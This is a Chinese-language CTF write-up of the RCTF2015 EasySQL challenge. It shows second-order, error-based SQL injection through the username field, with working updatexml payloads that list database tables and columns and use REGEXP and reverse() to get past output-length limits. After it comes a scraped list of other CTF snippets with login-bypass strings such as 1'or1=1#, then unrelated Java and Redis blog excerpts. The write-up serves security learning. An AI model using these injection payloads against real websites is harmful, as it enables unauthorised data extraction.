ZHH-BA
ZHH-BA

[RCTF2015]EasySQL

[RCTF2015]EasySQL

分析、测试

首先打开是拥有注册和登入的功能。

[RCTF2015]EasySQL_第1张图片

尝试了万能密码但是登入失败,应该是有防御的。害,老老实实的注册登入。

[RCTF2015]EasySQL_第2张图片

额叶良辰、赵日天,都是5年前的事情了。呢时候我还在高一,好快啊。

测试了一下好像都被限制死了,但是看见一个改密码的功能,呢应该是二次注入了。

重启一下容器回到注册界面测试

fuzz一下username发现确实有过滤,过滤了一些函数,长度为496都是报弹窗的,但是字符多是没有过滤的。

[RCTF2015]EasySQL_第3张图片 [RCTF2015]EasySQL_第4张图片

当我注册username为/zhh:" 时注册成功了。

[RCTF2015]EasySQL_第5张图片

修改密码的时候出现了报错回显!!我的用户名是/zhh:"有一个双引号,而且它是双引号包括的,就导致3个双引号报错。

[RCTF2015]EasySQL_第6张图片

应该是当注册用户的时候对用户名进行处理,然后修改密码中读取数据的没有处理了,导致报错。

构造payload

利用username数据处理不严格构造语句进行报错注入。

username=/zhh:"||(updatexml(1,concat(0x3a,(database())),1))#
password=123123
email=123123

2.登入

[RCTF2015]EasySQL_第7张图片

3.修改密码后报错出现数据库为web_sqli

[RCTF2015]EasySQL_第8张图片

4.查看表

username=zbt/"or(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli'))),1))#

[RCTF2015]EasySQL_第9张图片

5.查询flag表

username=zbt/"or(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#


username=zbt/"or(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag))),1))#


调皮

6.最后在user表里找到falg。


说我的字段列表不存在,对比上面的查询结果,才发现输出有长度限制,没报完字段名。

说明有长度限制,可是mysql截取的函数都被过滤了,看了大佬的博客才知道REGEXP这玩意。

mysql正则表达函数REGEXP绕过长度限制

菜鸟教程REGEXP

完整查询

username=zhh11"or(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

flag长度限制

1.这xxx也是长度限制

username=zhh"or(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1))#&password=123123&email=123123#


出来一半

username=zhh"or(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

[RCTF2015]EasySQL_第10张图片

2.reverse逆向输出

username=zhh"or(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

[RCTF2015]EasySQL_第11张图片

8.

4.完事下班

参考:
高诺琪
peri0d

你可能感兴趣的:([RCTF2015]EasySQL)

  • buuctf [极客大挑战 2019]EasySQL1 又一片风 CTF_WP数据库web安全
    本题考的是sql注入基础知识点,我们先来了解一下什么是sql注入及基本语句。sql注入是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。如果后端对用户所输入的数据管理不严,则可能会造成数据泄露,未授权查询等风险。对于本题,我们首先判断一下其闭合方式,sql报错如图,则闭合方式为单引号闭合。我们接着构造万能密码:1'or1=1#(#号为注释,将下个语句注释掉)得到回显f
  • SQL题 Nguhyb 数据库sql
    [极客大挑战2019]EasySQL进行简单的尝试,就知道是单引号的字符型注入万能密码进行一个简单的尝试结果就出来了还是要了解一下原理输入的是1',形成的sql语句是错误的SELECT*FROMtable_nameWHEREusername='1''andpassword='123';第一个单引号和第二个单引号形成了新的闭合,剩余第三个单引号,组成的sql语句不正确,于是语句报错,页面就会出现错误
  • [SUCTF 2019]EasySQL 1 Writeup(超级详细) StevenOnesir ctf
    本文章是该系列的第三篇,同样涉及到基础sql注入原理。首先我们能看到的就是一个输入框,直接告诉了你注入点。做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO!前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。先讲讲我的第一种玩法:首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是:Arra
  • 短路语法 [SUCTF 2019]EasySQL1 访白鹿 sql
    打开题目输入字符的时候啥也不回显。只有输入数字的时候页面有回显但是当我们输入union,from,sleep,where,order等,页面回显nonono,很明显过滤了这些关键词最开始我的思路是打算尝试双写绕过1;ununionionselect1,2,3发现依旧被过滤了。那我们试试堆叠注入1;showdatabases;发现页面有6个数据库1;showtables;有一个名为Flag的表那我们
  • 刷题 - BUUCTF(BUUOJ) - WEB - DAY3 ruibn ctfbuuctfwebsqlbugweb安全php
    目录BUUCTFWEB(一)[极客大挑战2019]EasySQL题目地址解题思路(二)[极客大挑战2019]Havefun题目地址解题思路(三)[HCTF2018]WarmUp题目地址解题思路(四)[ACTF2020新生赛]Include题目地址解题思路(五)[ACTF2020新生赛]Exec题目地址解题思路(六)[GXYCTF2019]PingPingPing题目地址解题思路(七)[强网杯201
  • buuctf web刷题笔记 liby-meigui 笔记学习
    [极客大挑战2019]EasySQL题目类型:简单的SQL注入直接万能密码[极客大挑战2019]Havefun题目类型:代码审计查看源代码Syclover@cl4y代码审计有一个cat变量,通过get方式传参,如果cat=dog输出flag使用构造payload:/?cat=dog重要的知识点——PHP封装协议重要的知识点——PHP封装协议:php://filter/read=convert.ba
  • BuuCTF_web PPXXWWRR web
    目录[HCTF2018]admin[极客大挑战2019]BuyFlag[ACTF2020新生赛]Exec[GXYCTF2019]PingPingPing[ACTF2020新生赛]Include[极客大挑战2019]EasySQL[极客大挑战2019]Havefun[HCTF2018]WarmUp[极客大挑战2019]SecretFile[极客大挑战2019]Upload[ACTF2020新生赛]U
  • BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL weixin_48799157 CTFSQL注入web安全
    小白一个,记录一下解题过程,如有错误请指正!一、EasySQL1.这里我们使用一句话万能密码就可以了,记得加上#1'or'1'='1'#2.登录就可以拿到flag二、LoveSQL网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag2.猜测flag应
  • 【极客大挑战 2019】Easy,Love,Baby-SQL narukuuuu CTFsql数据库web安全mysql学习
    连环题!!嘿嘿嘿[极客大挑战2019]EasySQL打开靶机随便输输,得了?[极客大挑战2019]LoveSQL进阶题来了嘿嘿嘿(用sqlmap是没有灵魂的哈哈哈)按照套路,随便注注试试万能密码,有回显接下来用orderby1-99来判断一下字段数试到4的时候出现报错那么字段数就是3了,输入查询语句:1'unionselect1,2,3#得到2,3两个回显点位爆库:1'unionselect1,2
  • [SUCTF 2019]EasySQL1 S-kindergarten BUUCTFweb题安全
    先用bp抓包fuzz一下看拉黑了哪些东西ctrl+i把他放到intruder中添加要注入的位置设置payload加载payload文件这是我自用的,可能有什么不足(需要可以自取)unionselectUnionsElectunion/**/selectunionselectasciisubstrfromorand1=1and1=1updatexmlinformation_schema.schema
  • BUUCTF持续更新中 每天都要努力哇 刷题记1024程序员节
    目录[HCTF2018]WarmUp[强网杯2019]随便注[SUCTF2019]EasySQL[GYCTF2020]Blacklist[GKCTF2020]cve版签到GXYCTF2019禁止套娃[De1CTF2019]SSRFMe[极客大挑战2019]EasySQL[极客大挑战2019]Havefun[极客大挑战2019]SecretFile[ACTF2020新生赛]Include2018]e
  • BUUCTF刷题记录(第一页和第二页部分题) kesou_0089 ctf-webweb安全安全
    这个晚上总算补完了所有的简易wp,二刷了一部分题目。小白做题,大佬勿喷。。[极客大挑战2019]EasySQL猜对用户名admin,判断密码框存在注入,直接万能密码,或者随意查询一下[HCTF2018]WarmUp代码审计典型例题,两个if判断需要false,最后一个需要true,最后通过文件包含漏洞查看,还是较为简单的题目[极客大挑战2019]Havefun…就传个参[ACTF2020新生赛]I
  • BUU刷题记1 Kanyun7 BUU刷题记php开发语言
    mititle:BUU刷题记1date:2022-05-1222:07:34tags:CTF_WEBswiper_index:1、[极客大挑2019]EasySQL1看到SQL就想到先尝试万能密码1’or1=1#解释:'是为了形成闭合语句,#为注释符(后面语句不再执行)需要注意的是:1.#可能会被URL自动进行编码导致语句错误2.空格被过滤可以使用/**/绕过解决:%23为#注释符的url编码语句
  • 极客大挑战2019(复习一下漏洞) 偶尔躲躲乌云334 javaservlet开发语言
    目录[极客大挑战2019]Upload一道文件上传题目的题,这道解法以前遇到过[极客大挑战2019]PHP[极客大挑战2019]Havefun这道题做完是真的简单[极客大挑战2019]SecretFile[极客大挑战2019]Http[极客大挑战2019]Knife[极客大挑战2019]BuyFlagSQL注入题目[极客大挑战2019]EasySQL编辑[极客大挑战2019]LoveSQL1'un
  • BUUWeb刷题记录 Whyyyyy‘ 网络安全安全
    [极客大挑战2019]EasySQL一、本题做题思路本题打开后是一个登录网站,结合题目所给提示,考虑应该是SQL注入看一下源代码,发现是get传参,和要加上check.php判断下闭合方式,发现是‘闭合结合其为登录页面,尝试一下万能密码得到flag。payload:url+/check.php?username=1&password=admin'or'1=1也可以选择直接在页面的用户名和密码上输入
  • BUUCTF Web1 ofo300 CTFCTFweb
    [极客大挑战2019]EasySQL试了个万能密码就能上去了flag:flag{8e685472-02e4-440a-b04e-b0d9b6d9c27f}[HCTF2018]WarmUp看源码有个source.php"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";re
  • [SUCTF 2019]EasySQL 1 白猫a٩ CTF做题笔记web安全数据库sql
    题目环境:把你的旗子给我,我会告诉你旗子是不是对的。判断注入类型1'回显结果不是字符型SQL注入1回显结果数字型SQL注入查所有数据库,采用堆叠注入1;showdatabases;查看所有数据表1;showtables;尝试爆Flag数据表的字段1;showcolumnsfromFlag;回显错误到这里,大佬们直接猜出了后端语句select$_GET['query']||flagfromFlag我
  • [极客大挑战 2019]EasySQL1 One_Lock_Li CTF学习#BUUCTFweb安全安全sql
    目录一、解题思路二、原理及相关知识点一、解题思路打开页面看到如下界面,有两个功能点且参数可控,允许上传,(这也是sql注入的基础)很明显与数据库存在信息交互,想到sql注入。尝试简单万能密码:
  • [极客大挑战 2019]EasySQL 图灵·飞︿( ̄︶ ̄)︿ WEB刷题1024程序员节
    【解题思路】1.打开靶机链接2.输入数据进行尝试输入1,1:可以在导航栏里面看到username和password的变量。3.使用万能密码username:1'or1=1#username:任意数据password:任意数据password:1'or1=1#4.获得flag
  • 题解记录-BUUCTF|Web (持续更新中) TTjsm1 偶尔WP但时不时断更篇web安全sql
    BUUCTF-Web(持续更新)[极客大挑战2019]EasySQL[HCTF2018]WarmUp[极客大挑战2019]Havefun[ACTF2020新生赛]Include[ACTF2020新生赛]Exec[强网杯2019]随便注[SUCTF2019]EasySQL[GXYCTF2019]PingPingPing[极客大挑战2019]SecretFile[极客大挑战2019]LoveSQL[极
  • 【BUUCTF Web】WriteUp超详细 宁宁想学安全 安全网络web安全
    BUUCTFWeb[极客大挑战2019]EasySQL[极客大挑战2019]Havefun[HCTF2018]WarmUp[ACTF2020新生赛]Include[ACTF2020新生赛]Exec[GXYCTF2019]PingPingPing[强网杯2019]随便注[SUCTF2019]EasySQL[极客大挑战2019]SecretFile[极客大挑战2019]LoveSQL[极客大挑战201
  • BUUCTF[极客大挑战 2019]BabySQL rumilc CTFBUUCTFweb安全网络安全安全
    [极客大挑战2019]EasySQL目录标题[极客大挑战2019]EasySQL题目题解[SUCTF2019]EasySQL题目题解[极客大挑战2019]LoveSQL题目题解BUUCTF[极客大挑战2019]BabySQL题目题解题目题解随便输入用户名和密码,admin和admin尝试注入:/check.php?username=admin&password=admin’出现报错信息,使用万能钥
  • BUUCTF解题web十一道 Sprint#51264 Webweb
    文章目录[2019极客大挑战]EASYSQL[2019极客大挑战]HAVEFUN[SUCTF]EASYSQL[ACTF2020新生赛]Include1[极客大挑战2019]SecretFile[极客大挑战2019]LoveSQL[ACTF2020新生赛]Exec[GXYCTF2019]PingPingPing[极客大挑战2019]Knife[护网杯2018]easy_tornado[极客大挑战20
  • buuctf-web作业总结 Jerem1ah 前端web安全安全
    buuctf-web作业总结0x01题目-[极客大挑战2019]EasySQL知识点:sql注入-万能密码(没有过滤的简单题解题:看见题目easysql+登录框,判定sql注入,登录框输入'or1=1#,密码随意输一个看下效果,成功!总结:对sql注入题目的判定(题目提示+输入框)sql注入万能密码,(账号在前,密码在后,#把后面的注释掉就随意填密码了)既然总结就多写点sql注入常见注释符(绕过过
  • Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结 m0_62239233 Buuctf-Web网络安全sql
    启动靶机目录题要做题过程第一步——找到页面与数据库产生交互的地方第二步——查看SQL语句闭合方式判断SQL注入闭合方式:方法一:使用\(转义字符)来判断SQL注入的闭合方式方法二:输入1、1'、1"判断SQL语句闭合方式第三步——进行SQL注入方法一:万能账号密码方法二:使用HackBar进行SQL注入一、查看页面的传参方式二、使用HackBar进行SQL注入思路总结题目类型:做题步骤:题要有数据
  • BUUCTFweb部分题解 dogeace
    前一段时间没有发现比较基础的的平台去做题,直到上个星期我发现了一个比较基础的平台供我刷题,所以就继续更新wp了。废话不多说现在开始写题解。题目名称[SUCTF2019]EasySQL[ACTF2020新生赛]Include[极客大挑战2019]SecretFile[极客大挑战2019]EasySQL写在最后[SUCTF2019]EasySQL先进入题目因为题目的名称已经提示是SQL注入了,所以我们
  • [极客大挑战 2019]Havefun1、EasySQL(BUUCTF) 在线学习蛐 网络攻防网页题解php
    前言:这篇文章还是是为了帮助一些像我这样的菜鸟找到简单的题解今天是2022年的最后一天,这一年我居然写了72篇文章获得5枚勋章还多了14个粉丝好了不说了,上水题的题解EasySQL题目描述解题工具:不需什么工具,如题名easysql解题过程:输入框都有了注入点就不用说了先提交admin123456看到提示密码错误又看到url,就可以直接注入了user框里输入1'发现报错那这题就很简单了直接输入万能
  • 刷题日记1(buuctf web题) IP² 前端网络安全
    buuctfweb题一、[极客大挑战2019]EasySQL二、[极客大挑战2019]Havefun三、[HCTF2018]WarmUp四、[ACTF2020新生赛]Include五、[ACTF2020新生赛]Exec一、[极客大挑战2019]EasySQL这题用的是sql注入,什么是sql注入?SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的
  • BUUCTF题解之[极客大挑战 2019]EasySQL 1 Junglei-Rim BUUCTF题解网络安全
    1.题目分析考查sql注入的基本使用。1.sql注入的定义SQL注入是一种针对Web应用程序的攻击技术,通过在应用程序的用户输入参数中嵌入SQL代码,进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据库服务器。SQL注入通常发生在Web应用程序中,因为Web应用程序使用输入参数来构建SQL语句,而这些输入参数往往不能被完全信任。攻击者可以利用这些
  • BUUCTF(刷题日记) yzhikk php服务器apachesql
    文章目录前言一、[极客大挑战2019]EasySQL二、[极客大挑战2019]Havefun三、[HCTF2018]WarmUp四、[ACTF2020新生赛]Include五、[ACTF2020新生赛]Exec六、[强网杯2019]随便注总结前言web刷题记录一、[极客大挑战2019]EasySQL首先使用万能密码:1’or1=1#直接拿到flag二、[极客大挑战2019]HavefunF12查看
  • Java开发中,spring mvc 的线程怎么调用? 小麦麦子 springmvc
    今天逛知乎,看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题,觉得挺有意思的,那哥们儿问的也听仔细,下面的回答也很详尽,分享出来,希望遇对遇到类似问题的Java开发程序猿有所帮助。 问题:     在用spring mvc架构的网站上,设一线程在虚拟机启动时运行,线程里有一全局
  • maven依赖范围 bitcarter maven
    1.test 测试的时候才会依赖,编译和打包不依赖,如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖,打包不依赖,如:tomcat的一些公用jar包 4.runtime 运行时依赖,编译不依赖 5.默认compile 依赖范围compile是支持传递的,test不支持传递 1.传递的意思是项目A,引用
  • Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xmlprematureJAXB
    如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误: org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream,然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
  • CSS Specificity 周凡杨 html权重Specificitycss
      有时候对于页面元素设置了样式,可为什么页面的显示没有匹配上呢? because specificity CSS 的选择符是有权重的,当不同的选择符的样式设置有冲突时,浏览器会采用权重高的选择符设置的样式。     规则:   HTML标签的权重是1 Class 的权重是10 Id 的权重是100
  • java与servlet g21121 servlet
    servlet 搞java web开发的人一定不会陌生,而且大家还会时常用到它。 下面是java官方网站上对servlet的介绍: java官网对于servlet的解释 写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
  • eclipse中安装maven插件 510888780 eclipsemaven
    1.首先去官网下载 Maven: http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压, 我将解压后的文件夹:apache-maven-3.2.3, 并将它放在 D:\tools目录下, 即 maven 最终的路径是:D:\tools\apache-mave
  • jpa@OneToOne关联关系 布衣凌宇 jpa
    Nruser里的pruserid关联到Pruser的主键id,实现对一个表的增删改,另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
  • 我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring事务配置
    这两天学到事务管理这一块,结合到之前的terasoluna框架,觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容,对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种,我承认后两种的内容很好,很强大。但是实际的项目当中
  • java 动态代理简单实现 antlove javahandlerproxydynamicservice
    dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); }   dynamicproxy.service.impl.HelloServiceImpl package dynamicp
  • JDBC连接数据库 百合不是茶 JDBC编程JAVA操作oracle数据库
             如果我们要想连接oracle公司的数据库,就要首先下载oralce公司的驱动程序,将这个驱动程序的jar包导入到我们工程中;   JDBC链接数据库的代码和固定写法;     1,加载oracle数据库的驱动;     &nb
  • 单例模式中的多线程分析 bijian1013 javathread多线程java多线程
    谈到单例模式,我们立马会想到饿汉式和懒汉式加载,所谓饿汉式就是在创建类时就创建好了实例,懒汉式在获取实例时才去创建实例,即延迟加载。 饿汉式: package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
  • javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScriptprototype
            对于从原型对象继承而来的成员,其读和写具有内在的不对等性。比如有一个对象A,假设它的原型对象是B,B的原型对象是null。如果我们需要读取A对象的name属性值,那么JS会优先在A中查找,如果找到了name属性那么就返回;如果A中没有name属性,那么就到原型B中查找name,如果找到了就返回;如果原型B中也没有
  • 【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
    MyBatis内置了数据源的支持,如:   <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
  • 我程序中用到的urldecode和base64decode,MD5 bitcarter cMD5base64decodeurldecode
    这里是base64decode和urldecode,Md5在附件中。因为我是在后台所以需要解码: string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
  • 腾讯资深运维专家周小军:QQ与微信架构的惊天秘密 ronin47
    社交领域一直是互联网创业的大热门,从PC到移动端,从OICQ、MSN到QQ。到了移动互联网时代,社交领域应用开始彻底爆发,直奔黄金期。腾讯在过去几年里,社交平台更是火到爆,QQ和微信坐拥几亿的粉丝,QQ空间和朋友圈各种刷屏,写心得,晒照片,秀视频,那么谁来为企鹅保驾护航呢?支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢?本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
  • java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素 bylijinnan java
    public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转,该数组的最小值为1。 */ publ
  • 看博客,应该是有方向的 Cb123456 反省看博客
    看博客,应该是有方向的:  我现在就复习以前的,在补补以前不会的,现在还不会的,同时完善完善项目,也看看别人的博客.  我刚突然想到的:  1.应该看计算机组成原理,数据结构,一些算法,还有关于android,java的。  2.对于我,也快大四了,看一些职业规划的,以及一些学习的经验,看看别人的工作总结的.    为什么要写
  • [开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
         为什么这样说呢?  因为科学和技术的发展有时候需要一个平缓和长期的积累过程,但是行政和商业体系本身充满各种不稳定性和不确定性,如果你希望长期从事某个科研项目,但是却又必须依赖于某种行政和商业体系,那其中的过程必定充满各种风险。。。       所以,为避免这种不确定性风险,我
  • 一个 sql优化 ([精华] 一个查询优化的分析调整全过程!很值得一看 ) cwqcwqmax9 sql
    见   http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例 提交时间: 2004-6-18 15:37:49      回复    发消息  环境: Linux ve
  • Hibernat and Ibatis dashuaifu Hibernateibatis
    Hibernate  VS  iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架,当前版本是3.05。它出身于sf.net,现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架,当前版本是2.0。目前属于apache的一个子项目了。 相对Hibernate“O/R”而言,iBATIS 是一种“Sql Mappi
  • 备份MYSQL脚本 dcj3sjt126com mysql
    #!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
  • iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
    转自 ibireme的博客   做iOS开发总会接触到一些第三方库,这里整理一下,做一些吐槽。   目前比较活跃的社区仍旧是Github,除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流,这里主要介绍一下Github里面流行的iOS库。   首先整理了一份 Github上排名靠
  • html wlwmanifest.xml eoems htmlxml
    所谓优化wp_head()就是把从wp_head中移除不需要元素,同时也可以加快速度。 步骤: 加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号,本身blog的版本号没什么意义,但是如果让恶意玩家看到,可能会用官网公布的漏洞攻击blog remov
  • 浅谈Java定时器发展 hacksin java并发timer定时器
    java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor,从后者的表现来看,可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比: 1.    Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
  • 移动端页面侧边导航滑入效果 ini jqueryWebhtml5cssjavascirpt
    效果体验:http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js,该版本的jQuery库是用于支持HTML5的浏览器上,不再兼容IE8以前的浏览器,现在移动端浏览器一般都支持HTML5,所以使用该jQuery没问题。HTML文件代码: <!DOCTYPE html> <h
  • AspectJ+Javasist记录日志 kane_xie aspectjjavasist
    在项目中碰到这样一个需求,对一个服务类的每一个方法,在方法开始和结束的时候分别记录一条日志,内容包括方法名,参数名+参数值以及方法执行的时间。   @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
  • redis学习笔记 MJC410621 redisNoSQL
    1)nosql数据库主要由以下特点:非关系型的、分布式的、开源的、水平可扩展的。 1,处理超大量的数据 2,运行在便宜的PC服务器集群上, 3,击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型: Sring 类型 set name lijie get name lijie set na
  • 使用redis实现分布式锁 qifeifei
    在多节点的系统中,如何实现分布式锁机制,其中用redis来实现是很好的方法之一,我们先来看一下jedis包中,有个类名BinaryJedis,它有个方法如下:   public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
  • BI并非万能,中层业务管理报表要另辟蹊径 张老师的菜 大数据BI商业智能信息化
           BI是商业智能的缩写,是可以帮助企业做出明智的业务经营决策的工具,其数据来源于各个业务系统,如ERP、CRM、SCM、进销存、HER、OA等。        BI系统不同于传统的管理信息系统,他号称是一个整体应用的解决方案,是融入管理思想的强大系统:有着系统整体的设计思想,支持对所有
  • 安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
    1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"  2.重新启动terminal输入:   rvm use ruby-2.2.1 --default  把当前安装的ruby版本设为默
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他